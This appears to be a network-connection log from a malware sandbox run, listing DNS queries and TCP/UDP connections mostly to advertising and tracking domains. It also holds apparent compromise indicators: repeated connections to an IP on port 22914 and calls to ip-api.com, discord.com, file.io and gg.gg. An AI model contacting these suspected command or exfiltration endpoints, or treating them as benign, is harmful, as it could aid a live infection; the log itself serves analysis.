| US | 8.8.8.8:53 | 243.233.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.232.173.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | feed.avplayer.com | udp |
| US | 8.8.8.8:53 | player.avplayer.com | udp |
| US | 8.8.8.8:53 | track4.aniview.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| SE | 184.31.15.24:443 | player.avplayer.com | tcp |
| US | 172.240.45.75:443 | track4.aniview.com | tcp |
| SE | 2.21.96.67:443 | feed.avplayer.com | tcp |
| US | 8.8.8.8:53 | cdn1.vntsm.com | udp |
| FR | 185.93.2.244:443 | cdn1.vntsm.com | tcp |
| SE | 184.31.15.24:443 | player.avplayer.com | tcp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| US | 8.8.8.8:53 | play.aniview.com | udp |
| SE | 23.34.233.243:443 | play.aniview.com | tcp |
| SE | 184.31.15.24:443 | player.aniview.com | tcp |
| US | 8.8.8.8:53 | content1.avplayer.com | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.96.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.2.93.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go1.aniview.com | udp |
| US | 172.240.45.75:443 | track4.aniview.com | udp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 8.8.8.8:53 | 81.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| NL | 89.149.193.100:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | ssp.disqus.com | udp |
| US | 8.8.8.8:53 | cs.krushmedia.com | udp |
| SE | 23.34.232.193:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| IE | 54.76.48.143:443 | ap.lijit.com | tcp |
| US | 34.98.64.218:443 | u.openx.net | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| GB | 23.214.129.249:443 | secure-assets.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| DE | 37.252.173.215:443 | secure.adnxs.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 54.205.87.181:443 | ssp.disqus.com | tcp |
| SE | 184.31.15.24:443 | content1.avplayer.com | udp |
| US | 8.8.8.8:53 | sync.aniview.com | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| DE | 51.89.9.254:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| SE | 23.34.233.229:443 | eus.rubiconproject.com | tcp |
| DE | 162.19.138.117:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| US | 8.8.8.8:53 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | api.rlcdn.com | udp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | visitor.omnitagjs.com | udp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| US | 8.8.8.8:53 | 100.193.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.48.76.54.in-addr.arpa | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | 193.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.adkernel.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.158.57.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 35.244.193.51:443 | lexicon.33across.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| US | 151.101.129.108:443 | acdn.adnxs.com | tcp |
| US | 35.244.193.51:443 | lexicon.33across.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| US | 151.101.129.108:443 | acdn.adnxs.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 216.200.232.253:443 | sync.mathtag.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 52.86.0.224:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | api-2-0.spot.im | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 52.86.0.224:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | jadserve.postrelease.com | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| IE | 52.16.250.162:443 | jadserve.postrelease.com | tcp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.149.71.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.129.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.110.2.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.173.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.87.205.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.233.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.133.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.193.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.57.245.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.86.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.232.200.216.in-addr.arpa | udp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| US | 64.74.236.191:443 | b1sync.zemanta.com | tcp |
| US | 64.74.236.191:443 | b1sync.zemanta.com | tcp |
| IE | 52.49.169.20:443 | match.prod.bidr.io | tcp |
| DE | 18.66.248.87:443 | api-2-0.spot.im | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| DE | 18.66.248.87:443 | api-2-0.spot.im | tcp |
| IE | 52.49.169.20:443 | match.prod.bidr.io | tcp |
| DE | 51.89.9.254:443 | onetag-sys.com | udp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| US | 64.74.236.191:443 | b1sync.zemanta.com | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| DE | 162.19.138.117:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | gum.aidemsrv.com | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 8.8.8.8:53 | ssc-cms.33across.com | udp |
| US | 13.107.42.16:443 | tcp | |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | sync.go.sonobi.com | udp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 104.17.43.93:443 | gum.aidemsrv.com | tcp |
| US | 67.202.105.23:443 | ssc-cms.33across.com | tcp |
| US | 54.156.110.223:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 192.132.33.67:443 | bttrack.com | tcp |
| IE | 52.50.240.62:443 | sync.crwdcntrl.net | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| US | 69.166.1.66:443 | sync.go.sonobi.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| IE | 52.50.240.62:443 | sync.crwdcntrl.net | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 192.132.33.67:443 | bttrack.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | prebid-server.rubiconproject.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | 19.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.250.16.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.199.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.169.49.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.248.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.236.74.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.43.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | targeting.unrulymedia.com | udp |
| DE | 108.157.4.123:443 | hb.yellowblue.io | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | pixel.tapad.com | udp |
| NL | 69.173.156.150:443 | prebid-server.rubiconproject.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 8.8.8.8:53 | track1.avplayer.com | udp |
| US | 172.240.45.76:443 | track1.avplayer.com | tcp |
| US | 8.8.8.8:53 | 62.240.50.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.110.156.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.105.202.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.33.132.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.4.157.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1f2e7.v.fwmrm.net | udp |
| DE | 3.69.181.171:443 | 1f2e7.v.fwmrm.net | tcp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | tcp |
| US | 192.178.49.163:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | bid.g.doubleclick.net | udp |
| BE | 64.233.184.157:443 | bid.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 76.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.181.69.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servedby.flashtalking.com | udp |
| GB | 23.49.162.100:443 | servedby.flashtalking.com | tcp |
| US | 8.8.8.8:53 | ssp-sync.criteo.com | udp |
| US | 172.240.45.78:443 | sync.aniview.com | udp |
| NL | 178.250.1.7:443 | ssp-sync.criteo.com | tcp |
| US | 8.8.8.8:53 | cm.adform.net | udp |
| DK | 37.157.3.20:443 | cm.adform.net | tcp |
| US | 8.8.8.8:53 | sync.search.spotxchange.com | udp |
| US | 8.8.8.8:53 | 157.184.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.162.49.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.250.178.in-addr.arpa | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| US | 69.166.1.32:443 | apex.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 8.8.8.8:53 | secure.flashtalking.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| DE | 54.93.42.69:443 | match.sharethrough.com | tcp |
| SE | 23.34.232.40:443 | secure.flashtalking.com | tcp |
| US | 8.8.8.8:53 | 20.3.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.flashtalking.com | udp |
| US | 8.8.8.8:53 | js.ad-score.com | udp |
| SE | 23.34.232.40:443 | cdn.flashtalking.com | tcp |
| DE | 18.173.233.54:443 | js.ad-score.com | tcp |
| US | 8.8.8.8:53 | hbx.media.net | udp |
| SE | 23.34.232.19:443 | hbx.media.net | tcp |
| US | 8.8.8.8:53 | data.ad-score.com | udp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| GB | 23.49.162.100:443 | servedby.flashtalking.com | tcp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| US | 8.8.8.8:53 | d9.flashtalking.com | udp |
| US | 8.8.8.8:53 | ad-events.flashtalking.com | udp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| IE | 52.215.105.210:443 | track.venatusmedia.com | tcp |
| GB | 142.250.187.194:443 | googleads4.g.doubleclick.net | tcp |
| IE | 52.17.200.81:443 | d9.flashtalking.com | tcp |
| GB | 3.11.159.224:443 | ad-events.flashtalking.com | tcp |
| GB | 3.11.159.224:443 | ad-events.flashtalking.com | tcp |
| GB | 23.49.162.100:443 | servedby.flashtalking.com | tcp |
| SE | 23.34.232.40:443 | cdn.flashtalking.com | tcp |
| SE | 23.34.232.40:443 | cdn.flashtalking.com | tcp |
| GB | 142.250.180.2:443 | ade.googlesyndication.com | tcp |
| GB | 142.250.180.2:443 | ade.googlesyndication.com | tcp |
| SE | 23.34.232.40:443 | cdn.flashtalking.com | tcp |
| SE | 23.34.232.40:443 | cdn.flashtalking.com | tcp |
| US | 130.211.115.4:443 | data.ad-score.com | tcp |
| US | 8.8.8.8:53 | 40.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.233.173.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.232.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.42.93.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.115.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.159.11.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.200.17.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssum.casalemedia.com | udp |
| US | 172.64.151.101:443 | ssum.casalemedia.com | tcp |
| US | 172.64.151.101:443 | ssum.casalemedia.com | udp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | 211.253.186.35.in-addr.arpa | udp |
| GB | 142.250.180.2:443 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 172.240.45.76:443 | track1.avplayer.com | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| NL | 37.120.141.155:22914 | tcp | |
| NL | 37.120.141.155:22914 | tcp | |
| US | 8.8.8.8:53 | 155.141.120.37.in-addr.arpa | udp |
| NL | 37.120.141.155:22914 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | analytics.google.com | udp |
| GB | 142.250.187.206:443 | analytics.google.com | tcp |
| RU | 91.215.42.31:443 | gg.gg | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.179.234:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 8.8.8.8:53 | www.file.io | udp |
| DE | 108.157.4.129:443 | www.file.io | tcp |
| US | 8.8.8.8:53 | 129.4.157.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hb.vntsm.com | udp |
| GB | 143.244.38.136:443 | hb.vntsm.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 172.67.23.234:443 | a.ad.gt | tcp |
| US | 8.8.8.8:53 | mydmp.exelator.com | udp |
| IE | 34.254.143.3:443 | mydmp.exelator.com | tcp |
| US | 8.8.8.8:53 | onsite-tag-logs.apps.nielsen.com | udp |
| US | 34.206.144.122:443 | onsite-tag-logs.apps.nielsen.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 122.144.206.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.clean.gg | udp |
| US | 34.95.69.49:443 | i.clean.gg | udp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| DE | 18.173.232.53:443 | aax.amazon-adsystem.com | tcp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 104.18.43.178:443 | elb.the-ozone-project.com | tcp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| NL | 185.89.211.84:443 | ib.adnxs.com | tcp |
| US | 69.166.1.32:443 | apex.go.sonobi.com | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | prg.smartadserver.com | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 8.8.8.8:53 | track.venatusmedia.com | udp |
| DE | 18.157.230.4:443 | tlx.3lift.com | tcp |
| NL | 145.40.97.67:443 | prebid.a-mo.net | tcp |
| NL | 89.149.193.96:443 | prg.smartadserver.com | tcp |
| NL | 89.149.193.96:443 | prg.smartadserver.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| IE | 52.215.105.210:443 | track.venatusmedia.com | tcp |
| DE | 18.197.138.194:443 | btlr.sharethrough.com | tcp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | 3bebd391c65e63397bb5b7ffe6d0827c.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tg1.aniview.com | udp |
| GB | 172.217.169.65:443 | 3bebd391c65e63397bb5b7ffe6d0827c.safeframe.googlesyndication.com | tcp |
| SE | 23.34.233.243:443 | tg1.aniview.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | track4.aniview.com | udp |
| US | 172.240.45.75:443 | track4.aniview.com | tcp |
| US | 8.8.8.8:53 | 4.230.157.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.193.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.138.197.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.193:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | go1.aniview.com | udp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| DE | 162.19.138.117:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| NL | 69.173.156.150:443 | prebid-server.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| DE | 108.157.4.85:443 | hb.yellowblue.io | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.117:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | visitor.omnitagjs.com | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| GB | 172.217.169.34:443 | cm.g.doubleclick.net | udp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| FR | 185.255.84.153:443 | visitor.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| GB | 172.217.169.34:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 216.200.232.249:443 | sync.mathtag.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 52.86.0.224:443 | sync.srv.stackadapt.com | tcp |
| US | 52.86.0.224:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| DE | 37.252.173.215:443 | secure.adnxs.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 64.74.236.191:443 | b1sync.zemanta.com | tcp |
| US | 64.74.236.191:443 | b1sync.zemanta.com | tcp |
| IE | 52.16.250.162:443 | jadserve.postrelease.com | tcp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | udp |
